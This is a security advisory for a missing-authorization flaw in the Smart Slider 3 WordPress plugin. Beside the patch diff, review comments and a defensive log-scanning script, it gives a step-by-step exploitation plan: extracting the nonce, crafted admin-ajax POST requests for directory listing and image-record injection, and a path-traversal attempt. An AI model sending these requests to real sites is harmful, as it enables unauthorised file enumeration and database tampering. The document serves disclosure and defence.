Smart Slider 3 <= 3.5.1.33 - Missing Authorization to Authenticated (Contributor+) Slider Data Read and Image Record Manipulation
Description
The Smart Slider 3 plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on multiple wp_ajax_smart-slider3 controller actions in all versions up to, and including, 3.5.1.33. The display_admin_ajax() method does not call checkForCap() (which requires unfiltered_html capability), and several controller actions only validate the nonce (validateToken()) without calling validatePermission(). This makes it possible for authenticated attackers, with Contributor-level access and above, to enumerate slider metadata and create, modify, and delete image storage records by obtaining the nextend_nonce exposed on post editor pages.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Technical Details
<= 3.5.1.33
What Changed in the Fix
Changes introduced in v3.5.1.34
Source Code
WordPress.org SVN
Detailed Exploitation Research Plan: CVE-2026-4065
1. Vulnerability Summary
The Smart Slider 3 plugin (up to and including 3.5.1.33) contains a missing authorization vulnerability in its AJAX handling logic. Specifically, the plugin uses a base controller AdminAjaxController that handles various actions via the wp_ajax_smart-slider3 hook. While the plugin implements nonce validation (validateToken()), it fails to perform capability checks (checkForCap() or validatePermission()) in several sensitive controller actions.
As a result, any authenticated user with access to a page where the nextend_nonce is exposed (such as the WordPress post editor) can perform actions intended for administrators, including listing filesystem directories (Information Disclosure) and creating or manipulating image storage records in the database.
2. Attack Vector Analysis
- Endpoint: `/wp-admin/admin-ajax.php`
- AJAX Action: `smart-slider3`
- Vulnerable Parameters:
  - `nextendcontroller`: The target controller (e.g., `browse` or `image`).
  - `nextendaction`: The target method (e.g., `index` or `addVisual`).
  - `nextend_nonce`: The CSRF token required for validation.
- Authentication: Contributor level or higher.
- Preconditions: The attacker must be authenticated as a Contributor to access the post editor and retrieve the required nonce.
3. Code Flow
- Entry Point: A request is sent to `admin-ajax.php?action=smart-slider3`.
- Routing: The plugin routes the request based on `nextendcontroller`.
- Missing Check: In `Nextend/Framework/Browse/ControllerAjaxBrowse.php`, the `actionIndex()` method is invoked.
  - Line 19: `$this->validateToken();` is called (verifies `nextend_nonce`).
  - Vulnerability: No call to `$this->validatePermission()` or `current_user_can()` follows.
- Execution (Browse):
  - The code calculates a path relative to `Filesystem::getImagesFolder()`.
  - It uses `glob()` and `scandir()` to list contents.
  - Line 95: Returns a JSON response containing the filesystem structure.
- Execution (Image Manipulation):
  - In `Nextend/Framework/Image/ControllerAjaxImage.php`, `actionAddVisual()` (Line 38) calls `$this->validateToken()`.
  - It proceeds to call `$model->addVisual()`, which writes to the database without verifying whether the user has permission to manage slider images.
4. Nonce Acquisition Strategy
The nextend_nonce is localized for the backend editor.
- Authentication: Log in as a Contributor user.
- Access Editor: Navigate to the new post page (`/wp-admin/post-new.php`).
- Script Trigger: Smart Slider 3 enqueues its assets on the editor page to support the "Smart Slider" button in the editor toolbar.
- JS Variable Extraction: The nonce is stored within the `_N2` JavaScript object, specifically inside the `AjaxHelper` configuration.
  - Use `browser_eval` to extract it: `_N2.AjaxHelper.ajaxArray['nextend_nonce']`
  - Alternatively, it may be found in the global scope if localized via `wp_localize_script`.
5. Exploitation Strategy
Step 1: Directory Enumeration (Read Access)
List the contents of the WordPress uploads directory to identify sensitive files or folder structures.
- HTTP Request:

```http
POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=browse&nextendaction=index HTTP/1.1
Content-Type: application/x-www-form-urlencoded

path=/&nextend_nonce=[EXTRACTED_NONCE]
```

- Expected Response: A JSON object containing `directories` and `files` keys listing the contents of the base image folder.
Step 2: Image Record Manipulation (Write Access)
Inject a malicious or arbitrary image storage record.
- HTTP Request:

```http
POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=addVisual HTTP/1.1
Content-Type: application/x-www-form-urlencoded

image=vulnerable_test_image.png&value=payload_data_here&nextend_nonce=[EXTRACTED_NONCE]
```

- Expected Response: A JSON object with the `visual` data, including a new `visualId`, confirming the record was created in the database.
6. Test Data Setup
- Create a Contributor user: `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`.
- Ensure Smart Slider 3 is active.
- (Optional) Create at least one slider to ensure the plugin's database tables are initialized: `wp eval "Nextend\SmartSlider3\Slider\ModelSlider::create(array('title' => 'Test Slider'));"`.
7. Expected Results
- The `browse/index` request should return a listing of the `wp-content/uploads` directory (or the plugin's configured image root).
- The `image/addVisual` request should return a success status and a `visualId`, indicating that a Contributor successfully modified the image metadata store, which normally requires `unfiltered_html` or Administrator privileges.
8. Verification Steps
After performing the HTTP requests:
- Check Directory Access: Verify the JSON response from `browse/index` matches the actual filesystem: `ls -R wp-content/uploads`
- Check Database Records: Query the database to see if the visual record was inserted: `wp db query "SELECT * FROM wp_nextend2_image_storage WHERE image = 'vulnerable_test_image.png';"`
  - Note: The table name prefix might vary based on the environment (usually `wp_nextend2_image_storage`).
9. Alternative Approaches
If nextendcontroller=browse is blocked or patched differently:
- Delete Visuals: Attempt to delete existing image visuals using `nextendcontroller=image&nextendaction=deleteVisual&visualId=[ID]`.
- Enumerate Subdirectories: Try path traversal-like structures in the `path` parameter (e.g., `path=../../`) to see if the `realpath` check in `ControllerAjaxBrowse.php` (Line 24) can be subverted, although it appears to attempt to anchor to the root.
Summary
The Smart Slider 3 plugin lacks authorization checks on several AJAX controller actions, including directory browsing and image metadata manipulation. This allows authenticated users with Contributor-level access to enumerate files on the server and modify slider-related database records by exploiting a nonce exposed in the post editor.
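For defenders, the two practical questions are whether an installed copy sits inside the affected range (up to and including 3.5.1.33, fixed in 3.5.1.34) and whether the sensitive `admin-ajax.php` actions named above have been called. The following Python script is an added example, not code from the plugin or from this advisory. It assumes a combined-format access log (the sample lines are constructed), and it can only see the query string: `action`, `nextendcontroller` and `nextendaction` travel in the URL, while `path` and `nextend_nonce` are in the POST body and never reach the log. Any hit therefore needs correlating with the session's user role before being treated as a confirmed misuse.

```python
"""Defender-side triage for the Smart Slider 3 missing-authorization issue.

Two checks, both written for this example:
  1. is_affected(): is an installed plugin version <= 3.5.1.33 (fixed in 3.5.1.34)?
  2. find_suspicious_requests(): scan access-log lines for the controller/action
     pairs the advisory lists as lacking a capability check.
"""
import re
from urllib.parse import parse_qs, urlsplit

FIXED_VERSION = (3, 5, 1, 34)  # first version carrying the validatePermission() calls

# controller/action pairs named in the advisory (lower-cased for matching)
SENSITIVE_ACTIONS = {
    ("browse", "index"),
    ("image", "addvisual"),
    ("image", "deletevisual"),
    ("image", "changevisual"),
}

# Combined/common log format: ip ident user [time] "METHOD target PROTO" status ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2026:10:01:02 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=smart-slider3&nextendcontroller=browse&nextendaction=index HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Mar/2026:10:01:09 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=smart-slider3&nextendcontroller=image&nextendaction=addVisual HTTP/1.1" 200 188',
    '198.51.100.4 - - [12/Mar/2026:10:02:00 +0000] "GET /wp-admin/post-new.php HTTP/1.1" 200 4096',
    '198.51.100.4 - - [12/Mar/2026:10:02:30 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 60',
]


def parse_version(version: str) -> tuple:
    """Turn '3.5.1.33' into (3, 5, 1, 33); missing components count as 0."""
    parts = []
    for piece in version.strip().split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group(0)) if m else 0)
    while len(parts) < 4:
        parts.append(0)
    return tuple(parts[:4])


def is_affected(version: str) -> bool:
    """True when the version is older than the fixed release 3.5.1.34."""
    return parse_version(version) < FIXED_VERSION


def classify_request(target: str):
    """Return (controller, action) if the request target hits a sensitive AJAX action."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query)
    if qs.get("action", [""])[0] != "smart-slider3":
        return None
    controller = qs.get("nextendcontroller", [""])[0].lower()
    action = qs.get("nextendaction", [""])[0].lower()
    pair = (controller, action)
    return pair if pair in SENSITIVE_ACTIONS else None


def find_suspicious_requests(lines) -> list:
    """Parse log lines and collect requests to the unprotected controller actions."""
    hits = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hit = classify_request(m.group("target"))
        if hit:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "method": m.group("method"),
                "status": int(m.group("status")),
                "controller": hit[0],
                "action": hit[1],
            })
    return hits


if __name__ == "__main__":
    print("3.5.1.33 affected:", is_affected("3.5.1.33"))
    print("3.5.1.34 affected:", is_affected("3.5.1.34"))
    for h in find_suspicious_requests(SAMPLE_LOG):
        print(f"{h['time']} {h['ip']} {h['method']} {h['controller']}/{h['action']} -> {h['status']}")
```

Run against a real log, treat each hit from a session that is not an Administrator (or that lacks `unfiltered_html`) as worth investigating, and pair the result with the version check: a site already on 3.5.1.34 rejects these calls, so hits there are noise rather than compromise.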
Vulnerable Code
```php
// Nextend/Framework/Browse/ControllerAjaxBrowse.php:17
public function actionIndex() {
    $this->validateToken();   // nonce only; no validatePermission() / capability check follows
    $requestedPath = Request::$REQUEST->getVar('path', '');
    $root = Filesystem::convertToRealDirectorySeparator(Filesystem::getImagesFolder());
```

---

```php
// Nextend/Framework/Image/ControllerAjaxImage.php:37
public function actionAddVisual() {
    $this->validateToken();   // nonce only; no capability check before the database write
    $image = Request::$REQUEST->getVar('image');
    $this->validateVariable(!empty($image), 'image');
    $model = $this->getModel();
    if (($visual = $model->addVisual($image, Request::$REQUEST->getVar('value')))) {
```

---

```php
// Nextend/Framework/Image/ControllerAjaxImage.php:54
public function actionDeleteVisual() {
    $this->validateToken();   // nonce only; no capability check before the delete
    $visualId = Request::$REQUEST->getInt('visualId');
```
Security Fix
@@ -36,6 +36,7 @@ public function actionAddVisual() { $this->validateToken(); + $this->validatePermission('smartslider_edit'); $image = Request::$REQUEST->getVar('image'); $this->validateVariable(!empty($image), 'image'); @@ -54,6 +55,7 @@ public function actionDeleteVisual() { $this->validateToken(); + $this->validatePermission('smartslider_delete'); $visualId = Request::$REQUEST->getInt('visualId'); $this->validateVariable($visualId > 0, 'image'); @@ -72,6 +74,7 @@ public function actionChangeVisual() { $this->validateToken(); + $this->validatePermission('smartslider_edit'); $visualId = Request::$REQUEST->getInt('visualId'); $this->validateVariable($visualId > 0, 'image');
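Review bot: the patch only touches actionAddVisual(), actionDeleteVisual() and actionChangeVisual() in ControllerAjaxImage.php; ControllerAjaxBrowse::actionIndex(), which this page also lists as calling validateToken() without any capability check, has no hunk here. Either add a matching `$this->validatePermission(...)` call after `$this->validateToken();` in actionIndex() or confirm it is fixed in a separate change before treating the browse/index path as closed.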
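Review bot: in each hunk the capability check is bolted on per action directly after `$this->validateToken();`, which fixes these three methods but keeps the pattern that produced the bug: any action that omits the second call is again reachable with nothing but a nonce. Since the description notes display_admin_ajax() never calls checkForCap(), a baseline capability check in the dispatcher, with the per-action `smartslider_edit` / `smartslider_delete` calls refining it, would make the next omission fail closed instead of open.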
Exploit Outline
1. Authenticate to the WordPress site as a Contributor or higher.
2. Access the WordPress post editor (e.g., `/wp-admin/post-new.php`) and extract the `nextend_nonce` from the `_N2` global JavaScript object (specifically within `_N2.AjaxHelper.ajaxArray`).
3. To enumerate directories: Send a POST request to `/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=browse&nextendaction=index` with parameters `path=/` and the stolen `nextend_nonce`. The response will contain a directory and file listing for the uploads directory.
4. To manipulate image records: Send a POST request to `/wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=image&nextendaction=addVisual` with the stolen `nextend_nonce`, an `image` name, and a `value` containing arbitrary metadata. This injects a record into the image storage database table.